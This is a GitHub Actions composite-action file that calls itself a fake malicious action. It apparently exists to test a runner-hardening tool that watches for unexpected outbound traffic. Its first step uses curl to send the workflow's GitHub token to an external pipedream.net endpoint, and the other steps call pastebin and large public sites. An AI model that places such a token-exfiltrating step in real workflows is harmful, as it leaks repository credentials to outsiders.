name: vulnerable-action
description: 'A fake malicious action to test harden runner with'

inputs:
  github-token:
    required: true

runs:
  using: composite
  steps:
    - name: anomolous outbound https call 1
      shell: bash
      run: curl -v "https://eord9n9ke0xjwtk.m.pipedream.net/get?token=${{ inputs.github-token }}"

    - name: anomolous outbound https call 2
      shell: bash
      run: curl https://pastebin.com -L  || true

    - name: anomolous outbound https call 3
      shell: bash
      run: curl https://google.com -L  || true

    - name: anomolous outbound https call 4
      shell: bash
      run: curl microsoft.com:443  --connect-timeout 5 || true

    - name: anomolous outbound https call 5
      shell: bash
      run: curl amazon.com:443  --connect-timeout 5 || true